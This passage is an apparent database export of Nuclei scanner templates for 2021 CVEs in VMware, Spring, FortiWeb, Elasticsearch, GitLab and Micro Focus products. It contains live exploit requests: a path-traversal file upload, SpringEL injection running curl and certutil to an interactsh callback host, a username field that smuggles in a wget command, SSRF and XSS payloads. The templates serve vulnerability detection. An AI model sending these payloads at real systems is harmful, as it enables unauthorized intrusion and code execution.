cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive\n\nhttp:\n - raw:\n - |\n POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\n Accept: text/html\n Referer: {{BaseURL}}\n Connection: close\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n Content-Disposition: form-data; name=\"logfile\"; filename=\"\"\n Content-Type: text/plain\n\n POC_TEST\n\n ------WebKitFormBoundarySHHbUsfCoxlX1bpS\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(body) == 28\"\n\n - type: word\n part: body\n words:\n - \"File uploaded successfully.\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dec5bc6259fe2ebe995f7e00acc2aeae9d9f6ca2612511f10dec4db4e5aec09c022005b30572b35de55a0959da7910704be0e21d80767290799899204fbd718bdc17:922c64590222798bb761d5b6d8e72950", "hash": "0cfc477746e9f7bab8b151c6a2affc51", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308283" }, "name": "CVE-2021-21985.yaml", "content": "id: CVE-2021-21985\n\ninfo:\n name: VMware vSphere Client (HTML5) - Remote Code Execution\n author: D0rkerDevil\n severity: critical\n description: |\n The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n - https://github.com/alt3kx/CVE-2021-21985_PoC\n - https://nvd.nist.gov/vuln/detail/CVE-2021-21985\n - http://packetstormsecurity.com/files/162812/VMware-Security-Advisory-2021-0010.html\n - https://github.com/onSec-fr/CVE-2021-21985-Checker\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-21985\n cwe-id: CWE-20\n epss-score: 0.97407\n epss-percentile: 0.9992\n cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: vcenter_server\n tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev\n\nhttp:\n - raw:\n - |\n POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n\n matchers:\n - type: word\n part: body\n words:\n - '{\"result\":{\"isDisconnected\":'\n# digest: 490a0046304402202cc2f275dde198f9620df34fa4a311077891a497c9ced4b61ef4ea211e77ca0c022006133ed8f8077e067f578d94dc86a5d389c8b79134b6c1550dd2a130c7c6b93d:922c64590222798bb761d5b6d8e72950", "hash": "74957bcde211923f9f5b323534e6f267", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308284" }, "name": "CVE-2021-22005.yaml", "content": "id: CVE-2021-22005\n\ninfo:\n name: VMware vCenter Server - Arbitrary File Upload\n author: PR3R00T\n severity: critical\n description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n impact: |\n Allows an attacker to upload and execute arbitrary files on the target system\n remediation: |\n Apply the necessary security patches or updates provided by VMware\n reference:\n - https://kb.vmware.com/s/article/85717\n - https://www.vmware.com/security/advisories/VMSA-2021-0020.html\n - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22005\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22005\n cwe-id: CWE-22\n epss-score: 0.97389\n epss-percentile: 0.99909\n cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: cloud_foundation\n tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n test_data\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"status_code_2 == 201\"\n - \"contains(body_1, 'VMware vSphere')\"\n - \"content_length_2 == 0\"\n condition: and\n# digest: 4a0a0047304502210096eeb1ab5ef33413e6827bc5c906e65ca58db66c0a4facc6185b209e745b14b7022003c37bb9242faba402e242e1e6d4443e7704ad4e1f9f5a437295a89d9a45f441:922c64590222798bb761d5b6d8e72950", "hash": "9b2702da4fa84bf5f05f4da8af0662fb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308285" }, "name": "CVE-2021-22053.yaml", "content": "id: CVE-2021-22053\n\ninfo:\n name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution\n author: forgedhallpass\n severity: high\n description: |\n Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability.\n reference:\n - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053\n - https://tanzu.vmware.com/security/cve-2021-22053\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22053\n - https://github.com/trhacknon/Pocingit\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-22053\n cwe-id: CWE-94\n epss-score: 0.51942\n epss-percentile: 0.97288\n cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: spring_cloud_netflix\n tags: cve,cve2021,rce,spring,vmware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/'\n - '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: regex\n part: interactsh_request\n regex:\n - 'curl|CertUtil'\n# digest: 4a0a00473045022100b4d3fe94711032d1a972803e2c53190fdefe451c2d9218a6df5094091460bd3c022017cebf0f65907519fa5d09748a58c0d8480286435615ad8a2d569a9f669b6a06:922c64590222798bb761d5b6d8e72950", "hash": "48aaa0a297f18fd0573373fba0c8e58c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308286" }, "name": "CVE-2021-22054.yaml", "content": "id: CVE-2021-22054\n\ninfo:\n name: VMWare Workspace ONE UEM - Server-Side Request Forgery\n author: h1ei1\n severity: high\n description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the necessary patches or updates provided by VMWare to fix the vulnerability.\n reference:\n - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/\n - https://www.vmware.com/security/advisories/VMSA-2021-0029.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22054\n - https://github.com/fardeen-ahmed/Bug-bounty-Writeups\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-22054\n cwe-id: CWE-918\n epss-score: 0.74813\n epss-percentile: 0.98065\n cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: workspace_one_uem_console\n fofa-query: banner=\"/AirWatch/default.aspx\" || header=\"/AirWatch/default.aspx\"\n tags: cve2021,cve,vmware,workspace,ssrf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Interactsh Server\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950", "hash": "5680ae139186245cceedebdd764d0741", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308287" }, "name": "CVE-2021-22122.yaml", "content": "id: CVE-2021-22122\n\ninfo:\n name: FortiWeb - Cross Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.\n impact: |\n Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking.\n remediation: |\n Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb.\n reference:\n - https://www.fortiguard.com/psirt/FG-IR-20-122\n - https://twitter.com/ptswarm/status/1357316793753362433\n - https://fortiguard.com/advisory/FG-IR-20-122\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22122\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-22122\n cwe-id: CWE-79\n epss-score: 0.00609\n epss-percentile: 0.76286\n cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortiweb\n tags: cve2021,cve,fortiweb,xss,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//\"\n - \"{{BaseURL}}/omni_success?cmdb_edit_path=\\\");alert('document.domain');//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"alert('document.domain')\"\n - \"No policy has been chosen.\"\n condition: and\n# digest: 4a0a00473045022100c166482f4524b3791b930460c6d197fdf8604c263fd9455f9d2e32f58da90a5c022064d7ba4d9e05973aec6889fd5dc2a740add4ccd266523146f2df998b31ce8a66:922c64590222798bb761d5b6d8e72950", "hash": "2e13bcb31ea8c2ea3ffb176a8966014f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308288" }, "name": "CVE-2021-22145.yaml", "content": "id: CVE-2021-22145\n\ninfo:\n name: Elasticsearch 7.10.0-7.13.3 - Information Disclosure\n author: dhiyaneshDk\n severity: medium\n description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145.\n reference:\n - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml\n - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html\n - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22145\n - https://security.netapp.com/advisory/ntap-20210827-0006/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-22145\n cwe-id: CWE-209\n epss-score: 0.96279\n epss-percentile: 0.99499\n cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elastic\n product: elasticsearch\n tags: cve2021,cve,elasticsearch,packetstorm,elastic\n\nhttp:\n - method: POST\n path:\n - '{{BaseURL}}/_bulk'\n\n body: |\n @\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'root_cause'\n - 'truncated'\n - 'reason'\n condition: and\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022014f0323c07e1c9f0a832d65c29ff4d67516455694fba9ccd53727b9fc4a6d38c022100fe6eb1ab330b614a4bd5dfc06532870a99005fcd2fabb1a02f2ed6cc21799534:922c64590222798bb761d5b6d8e72950", "hash": "db1e772b92609c39ed320f12eab96dbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308289" }, "name": "CVE-2021-22205.yaml", "content": "id: CVE-2021-22205\n\ninfo:\n name: GitLab CE/EE - Remote Code Execution\n author: GitLab Red Team\n severity: critical\n description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected GitLab instance.\n remediation: |\n Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability.\n reference:\n - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator\n - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json\n - https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/\n - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/\n - https://hackerone.com/reports/1154542\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22205\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2021-22205\n cwe-id: CWE-94\n epss-score: 0.97333\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve2021,cve,kev,hackerone,gitlab,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/users/sign_in\"\n\n host-redirects: true\n max-redirects: 3\n matchers:\n - type: word\n words:\n - \"015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df\"\n - \"02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b\"\n - \"051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce\"\n - \"08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290\"\n - \"0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59\"\n - \"0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753\"\n - \"1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f\"\n - \"14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4\"\n - \"1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4\"\n - \"20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6\"\n - \"27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959\"\n - \"292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369\"\n - \"2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae\"\n - \"30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f\"\n - \"318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2\"\n - \"33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1\"\n - \"335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac\"\n - \"34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86\"\n - \"3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087\"\n - \"340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86\"\n - \"38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d\"\n - \"3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd\"\n - \"39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514\"\n - \"39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09\"\n - \"3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e\"\n - \"3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb\"\n - \"40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3\"\n - \"4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1\"\n - \"450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54\"\n - \"455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8\"\n - \"4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b\"\n - \"45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44\"\n - \"473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117\"\n - \"4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2\"\n - \"4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e\"\n - \"4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160\"\n - \"504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb\"\n - \"52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c\"\n - \"530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf\"\n - \"5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71\"\n - \"62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51\"\n - \"64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a\"\n - \"655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f\"\n - \"67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2\"\n - \"69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca\"\n - \"6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb\"\n - \"70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b\"\n - \"7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5\"\n - \"73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d\"\n - \"77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f\"\n - \"78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab\"\n - \"79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9\"\n - \"7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9\"\n - \"7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5\"\n - \"81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3\"\n - \"83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1\"\n - \"93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b\"\n - \"969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e\"\n - \"9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b\"\n - \"9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e\"\n - \"a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528\"\n - \"a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9\"\n - \"ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5\"\n - \"ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8\"\n - \"aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b\"\n - \"b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711\"\n - \"b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445\"\n - \"bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca\"\n - \"be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a\"\n - \"bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7\"\n - \"bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4\"\n - \"bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218\"\n - \"c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4\"\n - \"c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c\"\n - \"d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71\"\n - \"d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb\"\n - \"d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c\"\n - \"d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f\"\n - \"dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56\"\n - \"def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3\"\n - \"e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a\"\n - \"e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0\"\n - \"eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687\"\n - \"ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d\"\n - \"ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd\"\n - \"ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83\"\n - \"f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812\"\n - \"f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649\"\n - \"f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11\"\n condition: or\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '(?:application-)(\\S{64})(?:\\.css)'\n# digest: 490a00463044022021787cd9270a230364edc25682b32eedd71949d7c6a77c9b84308a540f85761502203bbfe2d4d8ee766566ca25be55039a765ee27d86e8b66ff4f6971796a255e1e0:922c64590222798bb761d5b6d8e72950", "hash": "e27e15214f88c00baf41ffc85f78c86f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828a" }, "name": "CVE-2021-22214.yaml", "content": "id: CVE-2021-22214\n\ninfo:\n name: Gitlab CE/EE 10.5 - Server-Side Request Forgery\n author: Suman_Kar,GitLab Red Team\n severity: high\n description: |\n GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n - CVE-2021-39935\n - CVE-2021-22214\n - CVE-2021-22175\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.\n remediation: |\n Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher).\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22214\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39935\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22175\n - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html\n - https://docs.gitlab.com/ee/api/lint.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2021-22214\n cwe-id: CWE-918\n epss-score: 0.09317\n epss-percentile: 0.94551\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve2021,cve,gitlab,ssrf\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true\"\n\n body: |\n {\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}\n\n headers:\n Content-Type: application/json\n host-redirects: true\n max-redirects: 3\n matchers:\n - type: word\n part: body\n words:\n - \"does not have valid YAML syntax\"\n# digest: 4b0a00483046022100ff420e3f4d9d72d0aa090c7edd70646581bc6078a639d8c4eecddd0e337109bc022100f49642428c995841527b11d305d4c38776bd64b61bd40052ed4faca9e93d9c75:922c64590222798bb761d5b6d8e72950", "hash": "ca4908dd2a88eb67100587e9f3e6ca99", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30828b" }, "name": "CVE-2021-22502.yaml", "content": "id: CVE-2021-22502\n\ninfo:\n name: Micro Focus Operations Bridge Reporter - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n remediation: |\n Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability.\n reference:\n - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md\n - https://softwaresupport.softwaregrp.com/doc/KM03775947\n - https://www.zerodayinitiative.com/advisories/ZDI-21-153/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-22502\n - https://www.zerodayinitiative.com/advisories/ZDI-21-154/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-22502\n cwe-id: CWE-78\n epss-score: 0.95993\n epss-percentile: 0.99434\n cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microfocus\n product: operation_bridge_reporter\n tags: cve2021,cve,microfocus,obr,rce,kev\n\nhttp:\n - raw:\n - |\n POST /AdminService/urest/v1/LogonResource HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"An error occurred\"\n - \"AUTHENTICATION_FAILED\"\n condition: and\n\n - type: word\n part: header\n words:\n - 